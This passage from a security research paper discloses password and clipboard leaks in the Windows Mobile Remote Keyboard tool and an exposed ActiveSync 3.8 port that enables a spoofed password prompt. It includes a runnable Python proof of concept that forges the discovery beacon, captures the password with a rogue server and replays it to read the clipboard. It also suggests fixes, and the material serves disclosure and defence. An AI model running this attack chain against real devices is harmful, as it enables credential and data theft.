Miscellaneous Information Disclosure Bugs
Not all Windows Mobile security problems stem from failed protection schemes. This section outlines several other programs and bugs that were found during the research project.
From the vendor's website, "Remote Keyboard is a program that connects PC keyboard and mouse to your Pocket PC over ActiveSync connection or TCP/IP network." This is a handy program for power users who need to enter a lot of text into the PDA.
Once installed, the client on the PC sends out UDP packets to port 23 containing the PC's IP address; a listener on the PDA detects them. Upon detection, the PDA connects back to port 8123 on the specified IP address. At this point the PC asks for the password, which the PDA application supplies. Finally, the connection is established and the user can control the PDA remotely from the PC client.
We discovered a few problems with this program that expose the password used to authenticate the connection as well as the contents of the PC's clipboard. The first issue was found when we crafted a custom UDP packet containing our "server's" IP address and sent it onto the network. The Remote Keyboard listener on the PDA detected the packet and immediately tried to connect to our computer on port 8123. Seeing this, we wrote a small and simple "server" that emulated the login process. As expected, once the PDA had connected to the "server" and negotiated the connection, it sent the "server" the authentication password. In other words, the PDA never verifies the host it calls back to, so any host on the network that can send the beacon and answer the call-back with the expected prompt is handed the password.
Using this captured password, we then telnetted to the PC service running on port 8123 and discovered that, after a successful login, the program dumped the entire contents of the PC's clipboard onto the wire. Figure 4 shows a capture of this bug.
Figure 4: Remote Keyboard capture
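The discovery-and-login exchange described above, and the two-step abuse of it, as an added Python simulation that is not part of the original research or of the Remote Keyboard product. Only the ports (UDP 23 for the beacon, TCP 8123 for the call-back) and the order of the messages come from the text; the beacon payload (a dotted IPv4 string), the `PASSWORD?` prompt, the `OK`/`DENIED` status lines, the shared password and the sample clipboard contents are assumptions made so the exchange can run on loopback. `pda_listener` plays the PDA, `pc_service` the real PC, and `send_beacon` plus `rogue_server` the attacker; `run_attack_chain` runs the whole chain (forged beacon, call-back to the rogue server, password capture, replay of the captured password to the real service, clipboard read) on ephemeral loopback ports so it needs no privileges.

```python
import socket
import threading

# Ports named in the paper. Everything else about the wire format (beacon payload, prompt
# text, status lines) is an assumption made for this simulation, not Remote Keyboard's protocol.
BEACON_PORT = 23
CALLBACK_PORT = 8123
CLIPBOARD = b"vpn password: hunter2"  # constructed sample clipboard contents on the PC


def recv_line(sock):
    """Read one newline-terminated line (newline stripped) from a TCP socket."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.rstrip(b"\n")


def pda_listener(beacon_sock, password, callback_port=CALLBACK_PORT):
    """Simulated Remote Keyboard listener on the PDA: acts on the first beacon it hears,
    connects back to the advertised address and answers the login prompt with the shared
    password. Nothing here verifies who sent the beacon or who answers on the call-back port."""
    data, _ = beacon_sock.recvfrom(64)
    advertised_ip = data.decode()  # assumed beacon payload: dotted IPv4 as ASCII
    with socket.create_connection((advertised_ip, callback_port)) as conn:
        if recv_line(conn) == b"PASSWORD?":  # assumed prompt text
            conn.sendall(password + b"\n")
        return recv_line(conn)


def pc_service(listen_sock, password, clipboard):
    """Simulated PC side of the call-back port: prompts, checks the password and, on
    success, writes the clipboard to the socket (the post-login behaviour the paper observed)."""
    conn, _ = listen_sock.accept()
    with conn:
        conn.sendall(b"PASSWORD?\n")
        if recv_line(conn) == password:
            conn.sendall(b"OK\n" + clipboard + b"\n")
        else:
            conn.sendall(b"DENIED\n")


def rogue_server(listen_sock):
    """Attacker's fake PC: replays the same prompt and keeps whatever the PDA sends back."""
    conn, _ = listen_sock.accept()
    with conn:
        conn.sendall(b"PASSWORD?\n")
        captured = recv_line(conn)
        conn.sendall(b"OK\n")  # any reply will do; the password has already been captured
    return captured


def send_beacon(target_ip, advertised_ip, beacon_port=BEACON_PORT):
    """Forge the discovery packet the real PC client would send to the PDA."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(advertised_ip.encode(), (target_ip, beacon_port))


def fetch_clipboard(pc_addr, password):
    """Second step: log in to the real PC service with the captured password and read the
    clipboard it dumps after a successful login. Returns (status, clipboard)."""
    with socket.create_connection(pc_addr) as conn:
        recv_line(conn)  # the "PASSWORD?" prompt
        conn.sendall(password + b"\n")
        status = recv_line(conn)
        return status, (recv_line(conn) if status == b"OK" else b"")


def _loopback_socket(kind):
    """Bind to an ephemeral loopback port so the demo runs unprivileged (real ports: 23, 8123)."""
    s = socket.socket(socket.AF_INET, kind)
    s.bind(("127.0.0.1", 0))
    if kind == socket.SOCK_STREAM:
        s.listen(1)
    return s


def run_attack_chain(password=b"s3cret-pda"):
    """Whole chain on loopback: forged beacon -> PDA calls the rogue server -> password
    captured -> captured password replayed to the real PC -> clipboard read."""
    beacon = _loopback_socket(socket.SOCK_DGRAM)
    rogue = _loopback_socket(socket.SOCK_STREAM)
    pc = _loopback_socket(socket.SOCK_STREAM)
    results = {}
    workers = [
        threading.Thread(target=lambda: results.update(
            pda=pda_listener(beacon, password, rogue.getsockname()[1]))),
        threading.Thread(target=lambda: results.update(captured=rogue_server(rogue))),
        threading.Thread(target=lambda: pc_service(pc, password, CLIPBOARD)),
    ]
    for w in workers:
        w.start()
    send_beacon("127.0.0.1", "127.0.0.1", beacon.getsockname()[1])  # attacker's forged beacon
    for w in workers[:2]:
        w.join()
    results["status"], results["clipboard"] = fetch_clipboard(pc.getsockname(), results["captured"])
    workers[2].join()
    for s in (beacon, rogue, pc):
        s.close()
    return results
```

The point the simulation makes is structural rather than about any one message: the PDA acts on an unauthenticated beacon and then authenticates itself to whoever answers, so one UDP packet from any host on the segment is enough to obtain the password; and the real service then hands the clipboard to anyone presenting that password. A longer password does not help here; what is missing is verification of the PC by the PDA (for example, a challenge-response in both directions keyed on a pre-shared secret), and the clipboard should not be pushed at all until a session that the user has actually started.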
ActiveSync is "the" program used to sync a Windows Mobile device to a PC, and it is the most-downloaded Windows Mobile software application of all time. It contains functions for uploading software, syncing email, and much more. Version 4.0 and above removed every form of network-based synchronization; however, because many users rely on that feature for their day-to-day synchronization needs, Microsoft still provides ActiveSync 3.8 as a download.
As we discovered in mid-2005, the ActiveSync 3.8 service on the PC listens on port 990 on every existing interface (wired, wireless, PPP, etc.), not only on the link to the cradled device. This port gives access to the ActiveSync service, which can be abused to spawn a password dialog on the PC user's screen (Figure 5). If the user types a value into this dialog, the characters of the password are returned to the attacker, who can then use them to gain access to the protected PDA or to create a connection between an attacker's PDA and the target PC.
Figure 5: Spoofed spawned password dialog box